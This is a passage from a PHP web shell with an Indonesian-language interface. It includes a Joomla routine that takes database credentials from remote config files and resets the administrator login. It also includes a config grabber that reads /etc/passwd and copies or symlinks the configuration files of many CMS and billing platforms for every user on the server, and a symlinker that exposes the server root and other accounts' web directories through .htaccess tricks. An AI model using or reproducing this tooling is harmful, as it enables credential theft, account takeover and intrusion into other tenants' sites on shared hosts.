  1430.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1431.                 mysql_close($conn);
  1432.             } else {
  1433.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1434.                     echo "[+] username: <font color=lime>$user</font><br>";
  1435.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1436.                    
  1437.                 mysql_close($conn);
  1438.             }
  1439.         }
  1440.     }  
  1441.  
  1442. }
  1443. elseif($_GET['do'] == 'auto_cu_joomla') {
  1444. if($_POST['gass']) {
  1445.     echo "<center><h1>Joomla Auto Change User 2</h1>
  1446.         <form method='post'>
  1447.         Link Config: <br>
  1448.         <textarea name='link' style='width: 450px; height:250px;'>";
  1449.     UrlLoop($_POST['linkconf'],'joomla');  
  1450.     echo"</textarea><br>
  1451.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1452.         </form></center>";
  1453. }   else {
  1454.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1455.         <form method='post'>
  1456.         Link Config: <br>
  1457.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1458.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1459.         </form></center>";
  1460.     }
  1461. if($_POST['auto_cu_joomla']) {
  1462.    
  1463.         function anucurl($sites) {
  1464.             $ch = curl_init($sites);
  1465.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1466.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1467.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1468.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1469.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1470.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1471.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1472.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1473.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1474.             $data = curl_exec($ch);
  1475.                   curl_close($ch);
  1476.             return $data;
  1477.         }
  1478.         $link = explode("\r\n", $_POST['link']);
  1479.         $user = "root@1337";
  1480.         $pass = "root@1337";
  1481.         $passx = md5($pass);
  1482.         foreach($link as $dir_config) {
  1483.             $config = anucurl($dir_config);
  1484.                     $dbhost = ambilkata($config,"host = '","'");
  1485.                     $dbuser = ambilkata($config,"user = '","'");
  1486.                     $dbpass = ambilkata($config,"password = '","'");
  1487.                     $dbname = ambilkata($config,"db = '","'");
  1488.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1489.                     $prefix = $dbprefix."users";
  1490.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1491.                     $db = mysql_select_db($dbname);
  1492.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1493.                     $result = mysql_fetch_array($q);
  1494.                     $id = $result['id'];
  1495.                     $site = ambilkata($config,"sitename = '","'");
  1496.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1497.                     echo "Config => ".$dir_config."<br>";
  1498.                     echo "CMS => Joomla<br>";
  1499.                     if($site == '') {
  1500.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1501.                     } else {
  1502.                         echo "Sitename => $site<br>";
  1503.                     }
  1504.                     if(!$update OR !$conn OR !$db) {
  1505.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1506.                     } else {
  1507.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1508.                     }
  1509.                     mysql_close($conn);
  1510.                     }
  1511.     }  
  1512. } elseif($_GET['config'] == 'grabber') {
  1513.             if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1514. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1515. exit;
  1516. }
  1517.     if($_POST){ if($_POST['config'] == 'symvhosts') {
  1518.         @mkdir("symvhosts", 0777);
  1519. exe("ln -s / symvhosts/root");
  1520. $htaccess="Options Indexes FollowSymLinks
  1521. DirectoryIndex tokeichun69.htm
  1522. AddType text/plain .php
  1523. AddHandler text/plain .php
  1524. Satisfy Any";
  1525. @file_put_contents("symvhosts/.htaccess",$htaccess);
  1526.         $etc_passwd=$_POST['passwd'];
  1527.    
  1528.     $etc_passwd=explode("\n",$etc_passwd);
  1529. foreach($etc_passwd as $passwd){
  1530. $pawd=explode(":",$passwd);
  1531. $user =$pawd[5];
  1532. $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1533. if (preg_match('/vhosts/i',$user)){
  1534. exe("ln -s ".$user."/httpdocs/wp-config.php symvhosts/".$jembod."-Wordpress.txt");
  1535. exe("ln -s ".$user."/httpdocs/configuration.php symvhosts/".$jembod."-Joomla.txt");
  1536. exe("ln -s ".$user."/httpdocs/config/koneksi.php symvhosts/".$jembod."-Lokomedia.txt");
  1537. exe("ln -s ".$user."/httpdocs/forum/config.php symvhosts/".$jembod."-phpBB.txt");
  1538. exe("ln -s ".$user."/httpdocs/sites/default/settings.php symvhosts/".$jembod."-Drupal.txt");
  1539. exe("ln -s ".$user."/httpdocs/config/settings.inc.php symvhosts/".$jembod."-PrestaShop.txt");
  1540. exe("ln -s ".$user."/httpdocs/app/etc/local.xml symvhosts/".$jembod."-Magento.txt");
  1541. exe("ln -s ".$user."/httpdocs/admin/config.php symvhosts/".$jembod."-OpenCart.txt");
  1542. exe("ln -s ".$user."/httpdocs/application/config/database.php symvhosts/".$jembod."-Ellislab.txt");
  1543. }}}
  1544. if($_POST['config'] == 'symlink') {
  1545. @mkdir("symconfig", 0777);
  1546. @symlink("/","symconfig/root");
  1547. $htaccess="Options Indexes FollowSymLinks
  1548. DirectoryIndex tokeichun69.htm
  1549. AddType text/plain .php
  1550. AddHandler text/plain .php
  1551. Satisfy Any";
  1552. @file_put_contents("symconfig/.htaccess",$htaccess);}
  1553. if($_POST['config'] == '404') {
  1554. @mkdir("sym404", 0777);
  1555. @symlink("/","sym404/root");
  1556. $htaccess="Options Indexes FollowSymLinks
  1557. DirectoryIndex tokeichun69.htm
  1558. AddType text/plain .php
  1559. AddHandler text/plain .php
  1560. Satisfy Any
  1561. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1562. IndexIgnore *.txt404
  1563. RewriteEngine On
  1564. RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC]
  1565. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1566. @file_put_contents("sym404/.htaccess",$htaccess);
  1567. }
  1568. if($_POST['config'] == 'grab') {
  1569.                         mkdir("configg", 0777);
  1570.                         $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1571.                         $htc = fopen("configg/.htaccess","w");
  1572.                         fwrite($htc, $isi_htc);
  1573. }
  1574. $passwd = $_POST['passwd'];
  1575.  
  1576. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1577. foreach($user_config[1] as $user_tokeichun) {
  1578. $grab_config = array(
  1579. "/home/$user_tokeichun/.accesshash" => "WHM-accesshash",
  1580. "/home/$user_tokeichun/public_html/config/koneksi.php" => "Lokomedia",
  1581. "/home/$user_tokeichun/public_html/forum/config.php" => "phpBB",
  1582. "/home/$user_tokeichun/public_html/sites/default/settings.php" => "Drupal",
  1583. "/home/$user_tokeichun/public_html/config/settings.inc.php" => "PrestaShop",
  1584. "/home/$user_tokeichun/public_html/app/etc/local.xml" => "Magento",
  1585. "/home/$user_tokeichun/public_html/admin/config.php" => "OpenCart",
  1586. "/home/$user_tokeichun/public_html/application/config/database.php" => "Ellislab",
  1587. "/home/$user_tokeichun/public_html/vb/includes/config.php" => "Vbulletin",
  1588. "/home/$user_tokeichun/public_html/includes/config.php" => "Vbulletin",
  1589. "/home/$user_tokeichun/public_html/forum/includes/config.php" => "Vbulletin",
  1590. "/home/$user_tokeichun/public_html/forums/includes/config.php" => "Vbulletin",
  1591. "/home/$user_tokeichun/public_html/cc/includes/config.php" => "Vbulletin",
  1592. "/home/$user_tokeichun/public_html/inc/config.php" => "MyBB",
  1593. "/home/$user_tokeichun/public_html/includes/configure.php" => "OsCommerce",
  1594. "/home/$user_tokeichun/public_html/shop/includes/configure.php" => "OsCommerce",
  1595. "/home/$user_tokeichun/public_html/os/includes/configure.php" => "OsCommerce",
  1596. "/home/$user_tokeichun/public_html/oscom/includes/configure.php" => "OsCommerce",
  1597. "/home/$user_tokeichun/public_html/products/includes/configure.php" => "OsCommerce",
  1598. "/home/$user_tokeichun/public_html/cart/includes/configure.php" => "OsCommerce",
  1599. "/home/$user_tokeichun/public_html/inc/conf_global.php" => "IPB",
  1600. "/home/$user_tokeichun/public_html/wp-config.php" => "Wordpress",
  1601. "/home/$user_tokeichun/public_html/wp/test/wp-config.php" => "Wordpress",
  1602. "/home/$user_tokeichun/public_html/blog/wp-config.php" => "Wordpress",
  1603. "/home/$user_tokeichun/public_html/beta/wp-config.php" => "Wordpress",
  1604. "/home/$user_tokeichun/public_html/portal/wp-config.php" => "Wordpress",
  1605. "/home/$user_tokeichun/public_html/site/wp-config.php" => "Wordpress",
  1606. "/home/$user_tokeichun/public_html/wp/wp-config.php" => "Wordpress",
  1607. "/home/$user_tokeichun/public_html/WP/wp-config.php" => "Wordpress",
  1608. "/home/$user_tokeichun/public_html/news/wp-config.php" => "Wordpress",
  1609. "/home/$user_tokeichun/public_html/wordpress/wp-config.php" => "Wordpress",
  1610. "/home/$user_tokeichun/public_html/test/wp-config.php" => "Wordpress",
  1611. "/home/$user_tokeichun/public_html/demo/wp-config.php" => "Wordpress",
  1612. "/home/$user_tokeichun/public_html/home/wp-config.php" => "Wordpress",
  1613. "/home/$user_tokeichun/public_html/v1/wp-config.php" => "Wordpress",
  1614. "/home/$user_tokeichun/public_html/v2/wp-config.php" => "Wordpress",
  1615. "/home/$user_tokeichun/public_html/press/wp-config.php" => "Wordpress",
  1616. "/home/$user_tokeichun/public_html/new/wp-config.php" => "Wordpress",
  1617. "/home/$user_tokeichun/public_html/blogs/wp-config.php" => "Wordpress",
  1618. "/home/$user_tokeichun/public_html/configuration.php" => "Joomla",
  1619. "/home/$user_tokeichun/public_html/blog/configuration.php" => "Joomla",
  1620. "/home/$user_tokeichun/public_html/submitticket.php" => "^WHMCS",
  1621. "/home/$user_tokeichun/public_html/cms/configuration.php" => "Joomla",
  1622. "/home/$user_tokeichun/public_html/beta/configuration.php" => "Joomla",
  1623. "/home/$user_tokeichun/public_html/portal/configuration.php" => "Joomla",
  1624. "/home/$user_tokeichun/public_html/site/configuration.php" => "Joomla",
  1625. "/home/$user_tokeichun/public_html/main/configuration.php" => "Joomla",
  1626. "/home/$user_tokeichun/public_html/home/configuration.php" => "Joomla",
  1627. "/home/$user_tokeichun/public_html/demo/configuration.php" => "Joomla",
  1628. "/home/$user_tokeichun/public_html/test/configuration.php" => "Joomla",
  1629. "/home/$user_tokeichun/public_html/v1/configuration.php" => "Joomla",
  1630. "/home/$user_tokeichun/public_html/v2/configuration.php" => "Joomla",
  1631. "/home/$user_tokeichun/public_html/joomla/configuration.php" => "Joomla",
  1632. "/home/$user_tokeichun/public_html/new/configuration.php" => "Joomla",
  1633. "/home/$user_tokeichun/public_html/WHMCS/submitticket.php" => "WHMCS",
  1634. "/home/$user_tokeichun/public_html/whmcs1/submitticket.php" => "WHMCS",
  1635. "/home/$user_tokeichun/public_html/Whmcs/submitticket.php" => "WHMCS",
  1636. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1637. "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS",
  1638. "/home/$user_tokeichun/public_html/WHMC/submitticket.php" => "WHMCS",
  1639. "/home/$user_tokeichun/public_html/Whmc/submitticket.php" => "WHMCS",
  1640. "/home/$user_tokeichun/public_html/whmc/submitticket.php" => "WHMCS",
  1641. "/home/$user_tokeichun/public_html/WHM/submitticket.php" => "WHMCS",
  1642. "/home/$user_tokeichun/public_html/Whm/submitticket.php" => "WHMCS",
  1643. "/home/$user_tokeichun/public_html/whm/submitticket.php" => "WHMCS",
  1644. "/home/$user_tokeichun/public_html/HOST/submitticket.php" => "WHMCS",
  1645. "/home/$user_tokeichun/public_html/Host/submitticket.php" => "WHMCS",
  1646. "/home/$user_tokeichun/public_html/host/submitticket.php" => "WHMCS",
  1647. "/home/$user_tokeichun/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1648. "/home/$user_tokeichun/public_html/Supportes/submitticket.php" => "WHMCS",
  1649. "/home/$user_tokeichun/public_html/supportes/submitticket.php" => "WHMCS",
  1650. "/home/$user_tokeichun/public_html/domains/submitticket.php" => "WHMCS",
  1651. "/home/$user_tokeichun/public_html/domain/submitticket.php" => "WHMCS",
  1652. "/home/$user_tokeichun/public_html/Hosting/submitticket.php" => "WHMCS",
  1653. "/home/$user_tokeichun/public_html/HOSTING/submitticket.php" => "WHMCS",
  1654. "/home/$user_tokeichun/public_html/hosting/submitticket.php" => "WHMCS",
  1655. "/home/$user_tokeichun/public_html/CART/submitticket.php" => "WHMCS",
  1656. "/home/$user_tokeichun/public_html/Cart/submitticket.php" => "WHMCS",
  1657. "/home/$user_tokeichun/public_html/cart/submitticket.php" => "WHMCS",
  1658. "/home/$user_tokeichun/public_html/ORDER/submitticket.php" => "WHMCS",
  1659. "/home/$user_tokeichun/public_html/Order/submitticket.php" => "WHMCS",
  1660. "/home/$user_tokeichun/public_html/order/submitticket.php" => "WHMCS",
  1661. "/home/$user_tokeichun/public_html/CLIENT/submitticket.php" => "WHMCS",
  1662. "/home/$user_tokeichun/public_html/Client/submitticket.php" => "WHMCS",
  1663. "/home/$user_tokeichun/public_html/client/submitticket.php" => "WHMCS",
  1664. "/home/$user_tokeichun/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1665. "/home/$user_tokeichun/public_html/Clientarea/submitticket.php" => "WHMCS",
  1666. "/home/$user_tokeichun/public_html/clientarea/submitticket.php" => "WHMCS",
  1667. "/home/$user_tokeichun/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1668. "/home/$user_tokeichun/public_html/Support/submitticket.php" => "WHMCS",
  1669. "/home/$user_tokeichun/public_html/support/submitticket.php" => "WHMCS",
  1670. "/home/$user_tokeichun/public_html/BILLING/submitticket.php" => "WHMCS",
  1671. "/home/$user_tokeichun/public_html/Billing/submitticket.php" => "WHMCS",
  1672. "/home/$user_tokeichun/public_html/billing/submitticket.php" => "WHMCS",
  1673. "/home/$user_tokeichun/public_html/BUY/submitticket.php" => "WHMCS",
  1674. "/home/$user_tokeichun/public_html/Buy/submitticket.php" => "WHMCS",
  1675. "/home/$user_tokeichun/public_html/buy/submitticket.php" => "WHMCS",
  1676. "/home/$user_tokeichun/public_html/MANAGE/submitticket.php" => "WHMCS",
  1677. "/home/$user_tokeichun/public_html/Manage/submitticket.php" => "WHMCS",
  1678. "/home/$user_tokeichun/public_html/manage/submitticket.php" => "WHMCS",
  1679. "/home/$user_tokeichun/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1680. "/home/$user_tokeichun/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1681. "/home/$user_tokeichun/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1682. "/home/$user_tokeichun/public_html/clientsupport/submitticket.php" => "WHMCS",
  1683. "/home/$user_tokeichun/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1684. "/home/$user_tokeichun/public_html/Checkout/submitticket.php" => "WHMCS",
  1685. "/home/$user_tokeichun/public_html/checkout/submitticket.php" => "WHMCS",
  1686. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1687. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1688. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1689. "/home/$user_tokeichun/public_html/BASKET/submitticket.php" => "WHMCS",
  1690. "/home/$user_tokeichun/public_html/Basket/submitticket.php" => "WHMCS",
  1691. "/home/$user_tokeichun/public_html/basket/submitticket.php" => "WHMCS",
  1692. "/home/$user_tokeichun/public_html/SECURE/submitticket.php" => "WHMCS",
  1693. "/home/$user_tokeichun/public_html/Secure/submitticket.php" => "WHMCS",
  1694. "/home/$user_tokeichun/public_html/secure/submitticket.php" => "WHMCS",
  1695. "/home/$user_tokeichun/public_html/SALES/submitticket.php" => "WHMCS",
  1696. "/home/$user_tokeichun/public_html/Sales/submitticket.php" => "WHMCS",
  1697. "/home/$user_tokeichun/public_html/sales/submitticket.php" => "WHMCS",
  1698. "/home/$user_tokeichun/public_html/BILL/submitticket.php" => "WHMCS",
  1699. "/home/$user_tokeichun/public_html/Bill/submitticket.php" => "WHMCS",
  1700. "/home/$user_tokeichun/public_html/bill/submitticket.php" => "WHMCS",
  1701. "/home/$user_tokeichun/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1702. "/home/$user_tokeichun/public_html/Purchase/submitticket.php" => "WHMCS",
  1703. "/home/$user_tokeichun/public_html/purchase/submitticket.php" => "WHMCS",
  1704. "/home/$user_tokeichun/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1705. "/home/$user_tokeichun/public_html/Account/submitticket.php" => "WHMCS",
  1706. "/home/$user_tokeichun/public_html/account/submitticket.php" => "WHMCS",
  1707. "/home/$user_tokeichun/public_html/USER/submitticket.php" => "WHMCS",
  1708. "/home/$user_tokeichun/public_html/User/submitticket.php" => "WHMCS",
  1709. "/home/$user_tokeichun/public_html/user/submitticket.php" => "WHMCS",
  1710. "/home/$user_tokeichun/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1711. "/home/$user_tokeichun/public_html/Clients/submitticket.php" => "WHMCS",
  1712. "/home/$user_tokeichun/public_html/clients/submitticket.php" => "WHMCS",
  1713. "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1714. "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS",
  1715. "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS",
  1716. "/home/$user_tokeichun/public_html/MY/submitticket.php" => "WHMCS",
  1717. "/home/$user_tokeichun/public_html/My/submitticket.php" => "WHMCS",
  1718. "/home/$user_tokeichun/public_html/my/submitticket.php" => "WHMCS",
  1719. "/home/$user_tokeichun/public_html/secure/whm/submitticket.php" => "WHMCS",
  1720. "/home/$user_tokeichun/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1721. "/home/$user_tokeichun/public_html/panel/submitticket.php" => "WHMCS",
  1722. "/home/$user_tokeichun/public_html/clientes/submitticket.php" => "WHMCS",
  1723. "/home/$user_tokeichun/public_html/cliente/submitticket.php" => "WHMCS",
  1724. "/home/$user_tokeichun/public_html/support/order/submitticket.php" => "WHMCS",
  1725. "/home/$user_tokeichun/public_html/bb-config.php" => "BoxBilling",
  1726. "/home/$user_tokeichun/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1727. "/home/$user_tokeichun/public_html/box/bb-config.php" => "BoxBilling",
  1728. "/home/$user_tokeichun/public_html/host/bb-config.php" => "BoxBilling",
  1729. "/home/$user_tokeichun/public_html/Host/bb-config.php" => "BoxBilling",
  1730. "/home/$user_tokeichun/public_html/supportes/bb-config.php" => "BoxBilling",
  1731. "/home/$user_tokeichun/public_html/support/bb-config.php" => "BoxBilling",
  1732. "/home/$user_tokeichun/public_html/hosting/bb-config.php" => "BoxBilling",
  1733. "/home/$user_tokeichun/public_html/cart/bb-config.php" => "BoxBilling",
  1734. "/home/$user_tokeichun/public_html/order/bb-config.php" => "BoxBilling",
  1735. "/home/$user_tokeichun/public_html/client/bb-config.php" => "BoxBilling",
  1736. "/home/$user_tokeichun/public_html/clients/bb-config.php" => "BoxBilling",
  1737. "/home/$user_tokeichun/public_html/cliente/bb-config.php" => "BoxBilling",
  1738. "/home/$user_tokeichun/public_html/clientes/bb-config.php" => "BoxBilling",
  1739. "/home/$user_tokeichun/public_html/billing/bb-config.php" => "BoxBilling",
  1740. "/home/$user_tokeichun/public_html/billings/bb-config.php" => "BoxBilling",
  1741. "/home/$user_tokeichun/public_html/my/bb-config.php" => "BoxBilling",
  1742. "/home/$user_tokeichun/public_html/secure/bb-config.php" => "BoxBilling",
  1743. "/home/$user_tokeichun/public_html/support/order/bb-config.php" => "BoxBilling",
  1744. "/home/$user_tokeichun/public_html/includes/dist-configure.php" => "Zencart",
  1745. "/home/$user_tokeichun/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1746. "/home/$user_tokeichun/public_html/products/includes/dist-configure.php" => "Zencart",
  1747. "/home/$user_tokeichun/public_html/cart/includes/dist-configure.php" => "Zencart",
  1748. "/home/$user_tokeichun/public_html/shop/includes/dist-configure.php" => "Zencart",
  1749. "/home/$user_tokeichun/public_html/includes/iso4217.php" => "Hostbills",
  1750. "/home/$user_tokeichun/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1751. "/home/$user_tokeichun/public_html/host/includes/iso4217.php" => "Hostbills",
  1752. "/home/$user_tokeichun/public_html/Host/includes/iso4217.php" => "Hostbills",
  1753. "/home/$user_tokeichun/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1754. "/home/$user_tokeichun/public_html/support/includes/iso4217.php" => "Hostbills",
  1755. "/home/$user_tokeichun/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1756. "/home/$user_tokeichun/public_html/cart/includes/iso4217.php" => "Hostbills",
  1757. "/home/$user_tokeichun/public_html/order/includes/iso4217.php" => "Hostbills",
  1758. "/home/$user_tokeichun/public_html/client/includes/iso4217.php" => "Hostbills",
  1759. "/home/$user_tokeichun/public_html/clients/includes/iso4217.php" => "Hostbills",
  1760. "/home/$user_tokeichun/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1761. "/home/$user_tokeichun/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1762. "/home/$user_tokeichun/public_html/billing/includes/iso4217.php" => "Hostbills",
  1763. "/home/$user_tokeichun/public_html/billings/includes/iso4217.php" => "Hostbills",
  1764. "/home/$user_tokeichun/public_html/my/includes/iso4217.php" => "Hostbills",
  1765. "/home/$user_tokeichun/public_html/secure/includes/iso4217.php" => "Hostbills",
  1766. "/home/$user_tokeichun/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1767. );  
  1768.  
  1769. foreach($grab_config as $config => $nama_config) {
  1770.     if($_POST['config'] == 'grab') {
  1771. $ambil_config = file_get_contents($config);
  1772. if($ambil_config == '') {
  1773. } else {
  1774. $file_config = fopen("configg/$user_tokeichun-$nama_config.txt","w");
  1775. fputs($file_config,$ambil_config);
  1776. }
  1777. }
  1778. if($_POST['config'] == 'symlink') {
  1779. @symlink($config,"symconfig/".$user_tokeichun."-".$nama_config.".txt");
  1780. }
  1781. if($_POST['config'] == '404') {
  1782. $sym404=symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt");
  1783. if($sym404){
  1784.     @mkdir("sym404/".$user_tokeichun."-".$nama_config.".txt404", 0777);
  1785.     $htaccess="Options Indexes FollowSymLinks
  1786. DirectoryIndex tokeichun.htm
  1787. HeaderName tokeichun.txt
  1788. Satisfy Any
  1789. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1790. IndexIgnore *";
  1791.  
  1792. @file_put_contents("sym404/".$user_tokeichun."-".$nama_config.".txt404/.htaccess",$htaccess);
  1793.  
  1794. @symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt404/tokeichun.txt");
  1795.  
  1796.     }
  1797.  
  1798. }
  1799.  
  1800.                     }    
  1801.         }  if($_POST['config'] == 'grab') {
  1802.             echo "<center><a href='?dir=$dir/configg'><font color=lime>Done</font></a></center>";
  1803.         }
  1804.     if($_POST['config'] == '404') {
  1805.         echo "<center>
  1806. <a href=\"sym404/root/\">SymlinkNya</a>
  1807. <br><a href=\"sym404/\">Configurations</a></center>";
  1808.     }
  1809.      if($_POST['config'] == 'symlink') {
  1810. echo "<center>
  1811. <a href=\"symconfig/root/\">Symlinknya</a>
  1812. <br><a href=\"symconfig/\">Configurations</a></center>";
  1813.             }if($_POST['config'] == 'symvhost') {
  1814. echo "<center>
  1815. <a href=\"symvhost/root/\">Root Server</a>
  1816. <br><a href=\"symvhost/\">Configurations</a></center>";
  1817.             }
  1818.        
  1819.        
  1820.         }else{
  1821.         echo "<form method=\"post\" action=\"\"><center>
  1822.         </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1823.         echo include("/etc/passwd");
  1824.         echo "</textarea><br><br>
  1825.         <select class=\"select\" name=\"config\"  style=\"width: 450px;\" height=\"10\">
  1826.         <option value=\"grab\">Config Grab</option>
  1827.         <option value=\"symlink\">Symlink Config</option>
  1828.         <option value=\"404\">Config 404</option>
  1829.         <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1830. }
  1831. }
  1832. elseif($_GET['do'] == 'symlink') {
  1833. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1834. $d0mains = @file("/etc/named.conf");
  1835. ##httaces
  1836. if($d0mains){
  1837. @mkdir("scripts",0777);
  1838. @chdir("scripts");
  1839. @exe("ln -s / root");
  1840. $file3 = 'Options Indexes FollowSymLinks
  1841. DirectoryIndex tokeichun.html
  1842. AddType text/plain .php
  1843. AddHandler text/plain .php
  1844. Satisfy Any';
  1845. $fp3 = fopen('.htaccess','w');
  1846. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1847. echo "
  1848. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1849. <tr>
  1850. <td align=center><font size=2>S. No.</font></td>
  1851. <td align=center><font size=2>Domains</font></td>
  1852. <td align=center><font size=2>Users</font></td>
  1853. <td align=center><font size=2>Symlink</font></td>
  1854. </tr>";
  1855. $dcount = 1;
  1856. foreach($d0mains as $d0main){
  1857. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1858. flush();
  1859. if(strlen(trim($domains[1][0])) > 2){
  1860. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1861. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1862. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1863. <td>".$user['name']."</td>
  1864. <td><a href='$full/scripts/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1865. flush();
  1866. $dcount++;}}}
  1867. echo "</table>";
  1868. }else{
  1869. $TEST=@file('/etc/passwd');
  1870. if ($TEST){
  1871. @mkdir("scripts",0777);
  1872. @chdir("scripts");
  1873. exe("ln -s / root");
  1874. $file3 = 'Options Indexes FollowSymLinks
  1875. DirectoryIndex tokeichun.html
  1876. AddType text/plain .php
  1877. AddHandler text/plain .php
  1878. Satisfy Any';
  1879.  $fp3 = fopen('.htaccess','w');
  1880.  $fw3 = fwrite($fp3,$file3);
  1881.  @fclose($fp3);
  1882.  echo "
  1883.  <table align=center border=1><tr>
  1884.  <td align=center><font size=3>S. No.</font></td>
  1885.  <td align=center><font size=3>Users</font></td>
  1886.  <td align=center><font size=3>Symlink</font></td></tr>";
  1887.  $dcount = 1;
  1888.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1889.  while(!feof($file)){
  1890.  $s = fgets($file);
  1891.  $matches = array();
  1892.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1893.  $matches = str_replace("home/","",$matches[1]);
  1894.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1895.  continue;
  1896.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1897.  <td align=center><font class=txt>" . $matches . "</td>";
  1898.  echo "<td align=center><font class=txt><a href=$full/scripts/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1899.  $dcount++;}fclose($file);
  1900.  echo "</table>";}else{if($os != "Windows"){@mkdir("scripts",0777);@chdir("scripts");@exe("ln -s / root");$file3 = '
  1901.  Options Indexes FollowSymLinks
  1902. DirectoryIndex tokeichun.html
  1903. AddType text/plain .php
  1904. AddHandler text/plain .php
  1905. Satisfy Any
  1906. ';
  1907.  $fp3 = fopen('.htaccess','w');
  1908.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1909.  echo "
  1910.  <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1911.  <table align=center border=1><tr>
  1912.  <td align=center><font size=3>ID</font></td>
  1913.  <td align=center><font size=3>Users</font></td>
  1914.  <td align=center><font size=3>Symlink</font></td></tr>";
  1915.  $temp = "";$val1 = 0;$val2 = 1000;
  1916.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1917.  if ($uid)$temp .= join(':',$uid)."\n";}
  1918.  echo '<br/>';$temp = trim($temp);$file5 =
  1919.  fopen("test.txt","w");
  1920.  fputs($file5,$temp);
  1921.  fclose($file5);$dcount = 1;$file =
  1922.  fopen("test.txt", "r") or exit("Unable to open file!");
  1923.  while(!feof($file)){$s = fgets($file);$matches = array();
